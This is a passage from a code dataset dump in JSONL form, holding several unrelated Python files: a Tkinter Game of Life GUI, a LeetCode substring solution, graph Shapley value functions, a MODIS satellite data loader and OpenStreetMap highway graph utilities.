webbrowser.open(url)\n logger.debug(\"\")\n\n def about_command(self) -> None:\n settings = AboutWindow(self.master)\n settings.grab_set()\n logger.debug(\"\")\n\n\nclass SettingsWindow(tk.Toplevel):\n \"\"\"Settings window.\"\"\"\n def __init__(self, master: tk.Misc):\n super().__init__(master)\n self.title(\"Settings\")\n self.resizable(False, False)\n\n # settings\n self.settings = self._init_settings()\n\n # reset button\n self.reset_button = tk.Button(self, text=\"Reset\", padx=20, command=self.reset_command)\n self.reset_button.grid(row=2, column=0, sticky=tk.W, padx=20, pady=10)\n \n # OK button\n self.ok_button = tk.Button(self, text=\"OK\", padx=20, command=self.ok_command)\n self.ok_button.grid(row=2, column=1, sticky=tk.E, padx=10, pady=10)\n\n # Cancel button\n self.cancel_button = tk.Button(self, text=\"cancel\", padx=10, command=self.cancel_command)\n self.cancel_button.grid(row=2, column=2, sticky=tk.E, padx=10, pady=10)\n\n def _init_settings(self) -> dict:\n settings = dict()\n\n # Game settings\n game_settings = ttk.LabelFrame(self, text=\"Game\")\n game_settings.grid(column=0, row=0, padx=20, pady=5, sticky=tk.W)\n # Dimensions of the window \n settings[\"dim\"] = Option(game_settings, config_item=(\"GRID\", \"SIZE\"), label=\"Dimensions of the window\", validation_fn=int)\n settings[\"dim\"].grid(row=0, column=0, sticky=tk.EW)\n # Number of units \n settings[\"units\"] = Option(game_settings, config_item=(\"GRID\", \"UNITS\"), label=\"Number of units\", validation_fn=int)\n settings[\"units\"].grid(row=1, column=0, sticky=tk.EW)\n # FPS\n settings[\"fps\"] = Option(game_settings, config_item=(\"APP\", \"MAX_FPS\"), label=\"Maximum FPS\", validation_fn=int)\n settings[\"fps\"].grid(row=2, column=0, sticky=tk.EW)\n\n # Graphics settings\n graphics = ttk.LabelFrame(self, text=\"Graphics\")\n graphics.grid(column=0, row=1, padx=20, pady=5, sticky=tk.W)\n # Alive cell color \n settings[\"alive_cell_color\"] = Option(graphics, config_item=(\"GRID\", \"FOREGROUND\"), label=\"Alive cell color\", validation_fn=ImageColor.getrgb)\n settings[\"alive_cell_color\"].grid(row=0, column=0, sticky=tk.EW) \n # Dead cell color\n settings[\"dead_cell_color\"] = Option(graphics, config_item=(\"GRID\", \"BACKGROUND\"), label=\"Dead cell color\", validation_fn=ImageColor.getrgb)\n settings[\"dead_cell_color\"].grid(row=1, column=0, sticky=tk.EW) \n # Grid color\n settings[\"grid_color\"] = Option(graphics, config_item=(\"GRID\", \"EDGE_COLOR\"), label=\"Grid color\", validation_fn=ImageColor.getrgb)\n settings[\"grid_color\"].grid(row=2, column=0, sticky=tk.EW) \n\n return settings\n\n def ok_command(self) -> None:\n \"\"\"Saves the current configuration to config file and closed the settings window.\"\"\"\n for _, setting in self.settings.items():\n try:\n setting.save_to_config()\n except ValueError as e:\n MessageWindow(self.master, msg_type=\"Error\", msg=str(e))\n return\n\n msg = \"New settings will take effect next time you open the application.\"\n MessageWindow(self.master, msg_type=\"Info\", msg=str(msg))\n self.destroy()\n\n def cancel_command(self) -> None:\n \"\"\"Discards changes and closes the settings window.\"\"\"\n self.destroy()\n\n def reset_command(self) -> None:\n \"\"\"Resets the settings to default and closes the settings window.\"\"\"\n for _, setting in self.settings.items():\n setting.reset_default()\n logger.info(\"Config reset to default.\")\n\n\nclass MessageWindow(tk.Toplevel):\n \"\"\"Generic top-level window displaying a message.\"\"\"\n def __init__(self, master: tk.Misc, msg_type: str, msg: str):\n super().__init__(master)\n self.title(msg_type)\n self.resizable(False, False)\n self.grab_set()\n\n self.label = Label(self, text=msg)\n self.label.grid(row=0, column=0, padx=20, pady=10)\n\n self.ok_button = tk.Button(self, text=\"OK\", padx=20, command=self.destroy)\n self.ok_button.grid(row=1, column=0, padx=10, pady=10)\n\n\nclass AboutWindow(tk.Toplevel):\n \"\"\"Window displaying basic info about the app.\"\"\"\n def __init__(self, master: tk.Misc):\n super().__init__(master)\n self.title(\"About\")\n self.geometry(\"250x200\")\n self.resizable(False, False)\n self.grab_set()\n\n title_text = \"Game of Life\"\n title = ttk.Label(self, text=title_text, font=(\"Arial\",16))\n title.grid(row = 0, column = 0, padx=30, pady=10, sticky=tk.W)\n\n info_text = self._generate_info()\n info = ttk.Label(self, text=info_text)\n info.grid(row = 2, column = 0, sticky=tk.W)\n\n def _generate_info(self) -> str:\n \"\"\"Generates info string.\"\"\" \n # get author and email\n author = default_config[\"INFO\"][\"AUTHOR\"]\n email = default_config[\"INFO\"][\"EMAIL\"]\n version = default_config[\"INFO\"][\"VERSION\"]\n # author_info = project[\"tool.poetry\"][\"authors\"].strip('[\"\"]')\n # author_info = author_info.replace(\">\", \"\")\n # author, email = author_info.split(\" <\")\n\n # get version\n # version = project[\"tool.poetry\"][\"version\"].strip('\"')\n\n info_text = f\"\"\"\n Author: {author} \\n\n Email: {email} \\n\n Version: {version}\n \"\"\"\n\n return info_text\n\n\nclass Option(tk.Frame):\n \"\"\"Option as a pair composed of a label and an entry.\"\"\"\n def __init__(self, master: tk.Misc, config_item: tuple, label: str, validation_fn: Optional[Callable] = None) -> None:\n super().__init__(master)\n self.master = master\n # pairing with an item in the config file\n self.conf_item = config_item\n self.validation_fn = validation_fn\n # label\n self.label = ttk.Label(self, text=label)\n self.label.grid(row=0, column=0, sticky=tk.W, padx=20, pady=10)\n # entry\n self.entry = ttk.Entry(self, width=8)\n self.entry.insert('0', config.get(*config_item))\n self.entry.grid(row=0, column=1, sticky=tk.E, padx=10)\n self.columnconfigure(1, weight=1)\n\n def get_value(self) -> Any:\n return self.entry.get()\n\n def save_to_config(self) -> None:\n if self.validation_fn is not None:\n try:\n value = self.entry.get()\n self.validation_fn(value)\n except ValueError:\n error_msg = \"Value not supported.\"\n logger.error(error_msg)\n raise ValueError(error_msg)\n\n section, option = self.conf_item\n config.set(section, option, value=str(value))\n with open(config_path, 'w') as configfile:\n config.write(configfile)\n\n logger.debug(f\"Saved {value} to {self.conf_item} option.\")\n\n def reset_default(self) -> None:\n self.entry.delete(0, 'end')\n self.entry.insert('0', default_config.get(*self.conf_item))\n\n\n\nclass Grid(tk.Canvas):\n \"\"\"Canvas displaying grid and alive/dead cells.\"\"\"\n def __init__(\n self, \n master: tk.Misc, \n dim: int, \n num_units: int, \n background_color: tuple, \n foreground_color: tuple, \n edge_color: str, \n *args: Any, **kwargs: Any\n ) -> None:\n super(Grid, self).__init__(master, width=dim + 1, height=dim + 1, *args, **kwargs)\n self.edge_color = edge_color\n self.num_units = num_units\n self.unit_size = dim / num_units\n self.dim = dim\n self.background = np.dstack([\n np.ones((self.num_units, self.num_units)),\n np.ones((self.num_units, self.num_units)),\n np.ones((self.num_units, self.num_units))\n ]) * background_color\n self.foreground = np.dstack([\n np.ones((self.num_units, self.num_units)),\n np.ones((self.num_units, self.num_units)),\n np.ones((self.num_units, self.num_units))\n ]) * foreground_color\n self.cells = self.create_image(0, 0, anchor=tk.NW, image=None, tag=\"cells\")\n self.cell_img = None\n\n def draw_grid(self) -> None:\n self.delete('grid')\n for unit in range(self.num_units):\n pos = unit * self.unit_size\n self.create_line(0, pos, self.dim, pos, fill=self.edge_color, tag=\"grid\")\n self.create_line(pos, 0, pos, self.dim, fill=self.edge_color, tag=\"grid\")\n\n def draw_array(self, cell_array: np.ndarray) -> None:\n image = Image.fromarray(255 * (1 - cell_array.astype(np.uint8)))\n image = image.resize(size=(self.size, self.size), resample=Image.NEAREST)\n self.cell_img = ImageTk.PhotoImage(image)\n self.itemconfig(\"cells\", image=self.cell_img)\n self.tag_lower(\"cells\")\n\n def draw_img(self, cell_img: ImageTk.PhotoImage) -> None:\n self.itemconfig(\"cells\", image=cell_img)\n self.tag_lower(\"cells\")\n\n def coords_to_grid_position(self, x: int, y: int) -> Tuple[int, int]:\n i = int(y // self.unit_size)\n j = int(x // self.unit_size)\n return i, j\n\n\n\nclass GameOfLifeGUI:\n \"\"\"GUI for the Game of Life.\"\"\"\n def __init__(self, master: tk.Tk):\n self.master = master\n self.master.title(f\"Game of Life\")\n icon_path = os.path.join(package_dir, \"resources/images/icon.png\")\n self.master.iconphoto(True, tk.PhotoImage(file=icon_path))\n self.master.resizable(False, False)\n\n # initialize widgets\n self.widgets = self._init_widgets()\n\n # canvas update related params\n self.cells: tk.PhotoImage\n self.last_time: float\n self.current_time = time.perf_counter()\n\n logger.info(\"GUI initialized ...\")\n\n def _init_widgets(self) -> dict:\n widgets = dict()\n\n # menu bar\n widgets[\"menubar\"] = MenuBar(self.master)\n\n # grid canvas\n widgets[\"grid\"] = Grid(\n master=self.master,\n dim=config.getint(\"GRID\", \"SIZE\"),\n num_units=config.getint(\"GRID\", \"UNITS\"),\n background_color=ImageColor.getrgb(config[\"GRID\"][\"BACKGROUND\"]),\n foreground_color=ImageColor.getrgb(config[\"GRID\"][\"FOREGROUND\"]),\n edge_color=config.get(\"GRID\", \"EDGE_COLOR\"),\n highlightthickness=0\n )\n widgets[\"grid\"].draw_grid()\n widgets[\"grid\"].pack()\n\n return widgets\n\n def _show_fps(self) -> None:\n self.last_time = self.current_time\n self.current_time = time.perf_counter()\n elapsed = self.current_time - self.last_time\n self.master.title(f\"Game of Life ({int(1 / elapsed)} FPS)\")\n\n def show_cells(self, cells: tk.PhotoImage) -> None:\n \"\"\"Handle all cell images currently in the queue, if any.\"\"\"\n self._show_fps()\n self.cells = cells\n self.widgets[\"grid\"].draw_img(self.cells)\n","repo_name":"kuchynkm/game_of_life","sub_path":"game_of_life/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6436063561","text":"# \"\"\"\n# 题目:\n# Implement strStr().\n#\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n#\n# Example 1:\n#\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n#\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n# Clarification:\n#\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n#\n# For the purpose of this problem, we will return 0 when needle is an empty string.\n# This is consistent to C's strstr() and Java's indexOf().\n#\n# \"\"\"\n\n\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n \"\"\"\n 自己实现的找子串的函数, 使用字符串切片还挺快的,86%, 而且原来leetcode的运算时间是真的有波动的。\n :param haystack:\n :param needle:\n :return:\n \"\"\"\n if needle == \"\":\n return 0\n\n for i in range(len(haystack)-len(needle) + 1):\n if haystack[i:i+len(needle)] == needle:\n return i\n\n return -1\n\n\n\nif __name__ == '__main__':\n haystack = \"a\"\n needle = \"a\"\n\n solution = Solution()\n result = solution.strStr(haystack, needle)\n print(result)\n\n# \"\"\"\n# 分析:\n#\n# \"\"\"\n","repo_name":"niracler/python-exercise","sub_path":"leetcode/strings/my_strstr.py","file_name":"my_strstr.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"7816657517","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport networkx as nx\n\ndef metcalfe_dfs_tree(G, source, depth_limit=None):\n \"\"\"Returns a dict containing each vertex and its branch and depth.\n Parameters\n ----------\n G : NetworkX graph\n source : node, required\n Specify starting node for depth-first search (the node whose Shapley value\n is being enquired)\n depth_limit : int, optional (default=len(G))\n Specify the maximum search depth\n Returns\n -------\n D : Dictionary\n dict containing each vertex and their branch and depth\n \"\"\"\n \n visited = set()\n if depth_limit is None:\n depth_limit = len(G)\n \n visited.add(source)\n metcalfe_info = {node:(None, None) for node in G.nodes}\n metcalfe_info[source] = (0, 0)\n stack = [(source, 0, iter(G[source]))]\n branch_now = 1\n while stack:\n parent, depth_now, children = stack[-1]\n try:\n child = next(children)\n if child not in visited:\n metcalfe_info[child] = (depth_now + 1, branch_now)\n visited.add(child)\n if depth_now < depth_limit-1:\n stack.append((child, depth_now + 1, iter(G[child])))\n except StopIteration:\n if depth_now <= 1:\n branch_now = branch_now + 1\n stack.pop()\n return metcalfe_info\n\ndef value(G, S, f=None):\n \"\"\"Returns the Metcalfe value of a coalition in a graph.\n Parameters\n ----------\n G : NetworkX graph\n S : subset of nodes of G\n f : list of int containing vertex weights, optional (default=[1 for i in range(len(G.nodes))])\n\n Returns\n -------\n value : Metcalfe value of the subgraph of G induced by S\n \"\"\"\n\n if f == None:\n f = [1 for i in range(len(G.nodes))] \n G_S = nx.induced_subgraph(G, S)\n #nx.draw(G_S, with_labels=True, font_weight='bold')\n conn_comp_S = nx.connected_components(G_S)\n value = 0\n for comp in conn_comp_S:\n tmp = 0\n for node in comp:\n #print(node)\n tmp += f[node] \n value += tmp*tmp\n return value\n\ndef shapley_sub_count(d_ia, d_ib, v):\n \"\"\"Returns an intermediate sum in the Shapley value computation.\n Parameters\n ----------\n d_ia : distance between i and a\n d_ib : distance between i and b\n v : number of vertices\n\n Returns\n -------\n sum : the intermediate sum in shapley computation\n \"\"\"\n k = d_ia+d_ib\n if k == 0:\n return v\n sub_count = 0.0\n for s in range(k, v):\n prod = 1\n for p in range(1, k+1):\n prod *= (s+1-p)/(v-p)\n sub_count += prod\n return sub_count\n \ndef shapley(G, i, f=None):\n \"\"\"Returns the Shapley value of a node in a graph.\n Parameters\n ----------\n G : NetworkX graph\n i : node of G\n f : list of int containing vertex weights, optional (default=[1 for i in range(len(G.nodes))])\n\n Returns\n -------\n shapley : Shapley value of node i\n \"\"\"\n \n if f == None:\n f = [1 for i in range(len(G.nodes))]\n shapley = 0.0\n branch_dist = metcalfe_dfs_tree(G, i)\n for a in G.nodes:\n if branch_dist[a][1] == None:\n continue\n for b in G.nodes:\n if branch_dist[b][1] == None:\n continue\n if branch_dist[a][1] != branch_dist[b][1] or (a == b and a == i):\n shapley += f[a]*f[b]*shapley_sub_count(branch_dist[a][0], branch_dist[b][0], len(G.nodes))\n return shapley/len(G.nodes)\n","repo_name":"Mishalassif/network-shapley","sub_path":"metcalfe_shapley_tree.py","file_name":"metcalfe_shapley_tree.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29162267579","text":"# -- coding:utf-8 --\nimport math\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom pyhdf.SD import SD, SDC\nfrom pyhdf.error import HDF4Error\nfrom sklearn.neighbors import KDTree\nimport util\n\nDEFAULT_VALUE = -999999.0\nTIME_THRESHOLD = 1800 #时间误差上限30分钟\nDIST_THRESHOLD = 10000 #距离误差上限为10km\n\nclass Modis(object):\n def __init__(self, file_path):\n self.file_path = file_path\n self.time_arr = None\n self.time2dataDF = dict()\n self.time2data_tree = dict()\n self.time2modis_type = dict()\n self.col_num = 0\n\n def load_data(self):\n if not os.path.isdir(self.file_path):\n print('this is not a directory: ' + self.file_path)\n return -1\n\n files = os.listdir(self.file_path)\n valid_files = [file for file in files if file.endswith('.hdf')]\n\n for valid_file in valid_files:\n result = dict()\n file_name = valid_file\n #debug code\n #if '2019152.0610' not in file_name:\n # continue\n #debug end\n mod_type_fields = file_name.strip().split('_')\n mod_type = mod_type_fields[0][:3]\n\n date_time_fields = file_name.strip().split('.')\n date_time_str = date_time_fields[1][1:] + '.' + date_time_fields[2]\n timestamp = util.get_timestamp_modis(date_time_str)\n\n total_file_name = os.path.join(self.file_path, valid_file)\n file = None\n try:\n file = SD(total_file_name)\n except HDF4Error as e:\n print('open file error.', total_file_name)\n continue\n\n sds_obj1 = file.select('Water_Vapor_Infrared')\n pwv_ir = sds_obj1.get()\n _, n_cols = np.shape(pwv_ir)\n self.col_num = n_cols\n pwv_ir = pwv_ir.flatten()\n sds_obj2 = file.select('Longitude')\n lng = sds_obj2.get().flatten()\n sds_obj3 = file.select('Latitude')\n lat = sds_obj3.get().flatten()\n\n result['modis_pwv'] = pwv_ir\n result['lng'] = lng\n result['lat'] = lat\n\n resultDF = pd.DataFrame(result)\n self.time2dataDF[timestamp] = resultDF\n self.time2modis_type[timestamp] = mod_type\n\n self.time_arr = sorted(self.time2dataDF.keys())\n print(\"all modis data loaded.\")\n\n return 0\n\n def build_kdtree(self):\n for timestamp in self.time2dataDF:\n dataDF = self.time2dataDF[timestamp]\n lnglat_arr = np.array([point for point in zip(dataDF['lng'].values, dataDF['lat'].values)])\n lnglat_tree = KDTree(lnglat_arr)\n self.time2data_tree[timestamp] = lnglat_tree\n\n print('all kdtrees builded.')\n return 0\n\n def _buid_all(self):\n res = self.load_data()\n if res != 0:\n print(\"load modis data fail.\")\n return -1\n res = self.build_kdtree()\n if res != 0:\n print(\"build kdtree fail.\")\n return -1\n\n return 0\n\n def _get_nearest_data(self, lng, lat, timestamp):\n index = np.searchsorted(self.time_arr, timestamp)\n if index >= len(self.time_arr):\n index = len(self.time_arr) - 1\n elif index > 0 and math.fabs(self.time_arr[index-1]-timestamp) < math.fabs(self.time_arr[index]-timestamp):\n index -= 1\n nearest_timestamp = self.time_arr[index]\n\n if math.fabs(nearest_timestamp - timestamp) > TIME_THRESHOLD:\n return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n if not self.time2data_tree.has_key(nearest_timestamp):\n print('can not find any timestamp in time2data_tree', nearest_timestamp)\n return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n if not self.time2modis_type.has_key(nearest_timestamp):\n print('can not find any timestamp in time2modis_type', nearest_timestamp)\n return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n lnglat_tree = self.time2data_tree[nearest_timestamp]\n inds = lnglat_tree.query(np.array([lng, lat]).reshape(1,-1), k=1, return_distance=False)\n\n modis_type = self.time2modis_type[nearest_timestamp]\n\n if not self.time2dataDF.has_key(nearest_timestamp):\n print('can not find any timestamp in time2dataDF.', nearest_timestamp)\n return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n resultDF = self.time2dataDF[nearest_timestamp]\n resultLine = resultDF.ix[inds[0]]\n nearest_lng = resultLine['lng']\n nearest_lat = resultLine['lat']\n\n if util.calc_dist(lng, lat, nearest_lng, nearest_lat) > DIST_THRESHOLD:\n return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n return resultLine['modis_pwv'].values[0], nearest_timestamp, modis_type\n\n def _get_col_num(self):\n return self.col_num\n\nif __name__ == '__main__':\n modis = Modis(file_path='/Users/didi/Documents/hjy/MODIS-TPW/')\n res = modis._buid_all()\n if res != 0:\n print(\"build all fail.\")\n exit(-1)","repo_name":"amanilr/modis_ground","sub_path":"modis.py","file_name":"modis.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8409286042","text":"import json\nimport math\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\ndef load_json_data(file_path):\n \"\"\"\n Loads JSON data from a file.\n\n Parameters:\n - file_path (str): The path to the JSON file.\n\n Returns:\n - dict: The loaded JSON data.\n \"\"\"\n with open(file_path, 'r') as file:\n json_data = json.load(file)\n return json_data\n\ndef save_json_data(data, file_path):\n # Save the dictionary to a file\n with open(f\"{file_path}\", \"w\") as f:\n json.dump(data, f)\n \n#returns a touple of (lat, lon)\ndef get_coords(id, nodes):\n \n #find the node with the 'own_id'\n row = next((node for node in nodes if node['id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n\ndef get_line(id, nodes):\n row = next((node for node in nodes if node['id'] == id), None)\n\n return row\n\n#return 1 if true, 0 if false\ndef check_if_node_is_junction(id, nodes):\n row = next((node for node in nodes if node['id'] == id), None)\n\n if 'tags' in row:\n tags = row['tags']\n if 'highway' in tags and tags['highway'] == 'motorway_junction': \n return 1\n return 0\n\n#calculates the distance between two points and returns the distance in km\ndef get_distance(lat1, lon1, lat2, lon2):\n\n R = 6371.0\n\n # Convert latitude and longitude from degrees to radians\n lat1_rad = math.radians(lat1)\n lon1_rad = math.radians(lon1)\n lat2_rad = math.radians(lat2)\n lon2_rad = math.radians(lon2)\n\n # Haversine formula\n dlon = lon2_rad - lon1_rad\n dlat = lat2_rad - lat1_rad\n a = math.sin(dlat / 2)**2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2)**2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = R * c\n \n #return distance in km\n return distance\n\n#splits the json_data and returns a touple (nodes, ways)\ndef split_array_service_stations(json_data):\n \n ways = []\n nodes = []\n\n for el in json_data[\"elements\"]:\n if el[\"type\"] == \"node\":\n nodes.append(el)\n\n\n elif el[\"type\"] == \"way\":\n ways.append(el)\n\n else:\n print(\"ERROR: There shouldn't be another type (exept node and way)\")\n return (nodes, ways) \n \n#splits the json_data and returns a touple (nodes, highway)\ndef split_array_highway(json_data):\n \n nodes = []\n highway = []\n\n for el in json_data[\"elements\"]:\n #is a node\n if el[\"type\"] == \"node\":\n nodes.append(el)\n\n elif el[\"type\"] == \"way\":\n highway.append(el)\n else:\n print(\"ERROR: There shouldn't be another type (exept node and way)\")\n return (nodes, highway) \n\n#returns the (lat, lon) of the centrois of every sercice station way\ndef merge_area_to_point(way_service, nodes_service): # service node\n\n #calcualte for every area the centroid\n centroids = []\n for el in way_service:\n lats = []\n lons = []\n #get the coordinates for every node and add to list\n for ids in el['nodes']:\n lat, lon = get_coords(ids, nodes_service)\n lats.append(lat)\n lons.append(lon)\n \n #calculate centroid\n centroid_lat = sum(lats) / len(lats)\n centroid_lon = sum(lons) / len(lons)\n centroids.append((centroid_lat, centroid_lon))\n\n #deleate centroids, which are nearer than 0,2m\n sorted_centroids = []\n for lat1, lon1 in centroids:\n for lat2, lon2 in centroids:\n if(get_distance(lat1, lon1, lat2, lon2) < 0,1):\n #don't inclde point\n break\n sorted_centroids.append((lat1, lon1))\n\n return sorted_centroids\n\n#returns a list of id. All the nodes in this list repesent a rest area\ndef add_service_to_highway(nodes_highway, service):\n marked_street_nodes = []\n\n for lat, lon in service:\n # Find nearest point in nodes\n nearest_id = \"\" \n nearest_distance = float('inf') # Initialize with positive infinity\n\n for el in nodes_highway:\n distance = get_distance(lat, lon, el['lat'], el['lon'])\n \n # Check if the ID is not in marked_street_nodes before updating\n if el['id'] not in marked_street_nodes and distance < nearest_distance:\n nearest_id = el['id']\n nearest_distance = distance\n\n # Add nearest point to the marked list\n if nearest_id not in marked_street_nodes:\n marked_street_nodes.append(nearest_id)\n\n return marked_street_nodes\n\n\n#deletes every highway node, which is not marked(which doesn't represent a rest area)\ndef delete_usless_highway_nodes(way_highway, marked_nodes):\n #print(marked_nodes)\n #for every street\n for el in way_highway:\n #chech each point, if its a marked one, if not delete\n marked_ids = []\n for node_id in el['nodes']:\n #check if nodes are marked, if yes add to list\n if node_id in marked_nodes:\n \n marked_ids.append(node_id)\n print(\"appended\")\n #reset list of nodes on the highway to only the marked ones\n el['nodes'] = marked_ids \n\n return way_highway\n \n#adds a property to each node with name 'own_id' and a index starting with 0\ndef add_own_id(nodes):\n i = 0\n for el in nodes:\n el['own_id'] = i\n i += 1\n return nodes\n \n#gets the lat and long of the node with own_id == id\ndef get_position_id(id, nodes):\n \n #find the node with the 'own_id'\n row = next((node for node in nodes if node['id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n \n#gets the lat and long of the node with own_id == id\ndef get_position_own_id(id, nodes):\n \n #find the node with the 'own_id'\n row = next((node for node in nodes if node['own_id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n\ndef create_edges_array(nodes, ways):\n \n\n #get all edges with own_id (not the overpass_id) \n edges = []\n for el in ways:\n way_nodes = el['nodes']\n num = len(way_nodes)\n for i in range (0, num-1):\n #get overpass id\n overpass_id_a = int(way_nodes[i])\n overpass_id_b = int(way_nodes[i+1])\n\n #get own_id\n anode = next((node for node in nodes if node['id'] == overpass_id_a), None)\n bnode = next((node for node in nodes if node['id'] == overpass_id_b), None)\n \n aid = anode['own_id']\n bid = bnode['own_id']\n\n #add edge with own_ids\n edges.append((aid, bid))\n print(edges)\n \n \n #deleate doube edges\n unique_edges = []\n for edge in edges:\n if edge not in unique_edges and (edge[1], edge[0]) not in unique_edges:\n unique_edges.append(edge)\n\n #get lenght of edges\n unique_distance_edges = []\n for a, b in unique_edges:\n lata, lona = get_position_own_id(a, nodes)\n latb, lonb = get_position_own_id(b, nodes)\n distance = get_distance(lata, lona, latb, lonb)\n unique_distance_edges.append((a, b, distance))\n \n #delete edges > 60km\n final_edges = []\n for a, b, dis in unique_distance_edges:\n if dis < 60:\n final_edges.append((a,b, dis))\n \n return final_edges\n\n#deletes all nodes which aren't in the to_keep_ids list (overpass id)\ndef delete_useless_street_nodes_of_nodes_array(nodes, to_keep_ids):\n sorted_nodes = []\n for el in nodes:\n if el['id'] in to_keep_ids:\n sorted_nodes.append(el)\n \n return sorted_nodes\n\n#creates a graph\ndef create_graph(nodes, edges):\n\n #Create a graph \n g = nx.Graph()\n\n #add_nodes\n for el in nodes:\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(el['own_id'], pos=(el['lat'], el['lon']))\n\n #add edges with distance\n for el in edges:\n #print(f\"edges: {el[0]}, {el[1]}, {el[2]}\")\n g.add_edge(el[0], el[1], weight=el[2])\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph2(nodes, edges, othernodes):\n\n #Create a graph \n g = nx.Graph()\n\n max_own_id = 0\n\n #add_nodes\n for el in nodes:\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(el['own_id'], pos=(el['lat'], el['lon']), color='red')\n if el['own_id'] > max_own_id:\n max_own_id = el['own_id']\n #add edges with distance\n for el in edges:\n #print(f\"edges: {el[0]}, {el[1]}, {el[2]}\")\n g.add_edge(el[0], el[1], weight=el[2])\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n #print(f\"nodes: \\n {nodes} \\n edges: \\n {edges}, othernodes: \\n{othernodes}\")\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n '''# Draw othernodes in a different color\n othernode_positions = {i: (lon, lat) for i, (lat, lon) in enumerate(othernodes)}\n print(othernode_positions)\n nx.draw_networkx_nodes(g, pos=othernode_positions, node_size=200, node_color='red', alpha=0.7)\n '''\n '''for i ,(lat, lon) in enumerate(othernodes):\n g.add_node(el['own_id'], pos=(lat, lon), color='red')'''\n \n\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph3(nodes, edges, ids):\n \"\"\"\n Creates a graph with colored nodes based on the given IDs.\n\n Parameters:\n - nodes (list): List of dictionaries representing nodes with 'own_id', 'lat', and 'lon'.\n - edges (list): List of tuples representing edges with the format (node1, node2, weight).\n - ids (list): List of node IDs to be colored red.\n\n Returns:\n - None: The function plots the graph but doesn't return any value.\n \"\"\"\n # Create a graph\n g = nx.Graph()\n\n # Add nodes\n for el in nodes:\n if(el['id'] in ids):\n node_id = el['own_id']\n pos = (el['lat'], el['lon'])\n g.add_node(node_id, pos=pos, color='red' if node_id in ids else 'blue')\n\n # Add edges with distance\n for el in edges:\n g.add_edge(el[0], el[1], weight=el[2])\n\n # Extract node positions and colors\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n node_colors = [g.nodes[node]['color'] for node in g.nodes]\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=100, node_color=node_colors, alpha=0.7)\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n\n # Display the plot\n plt.title(\"Graph of Nodes\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph4(nodes, edges, coords):\n # Create a graph\n g = nx.Graph()\n\n # Add nodes\n for el in nodes:\n node_id = el['own_id']\n pos = (el['lat'], el['lon'])\n g.add_node(node_id, pos=pos, color='red')\n\n for i, (lat, lon) in enumerate(coords):\n g.add_node(i+424, pos=(lat, lon), color='blue')\n\n \n\n # Add edges with distance\n for el in edges:\n g.add_edge(el[0], el[1], weight=el[2])\n\n # Extract node positions and colors\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n node_colors = [g.nodes[node]['color'] for node in g.nodes]\n\n # Get the edgelist\n edgelist = 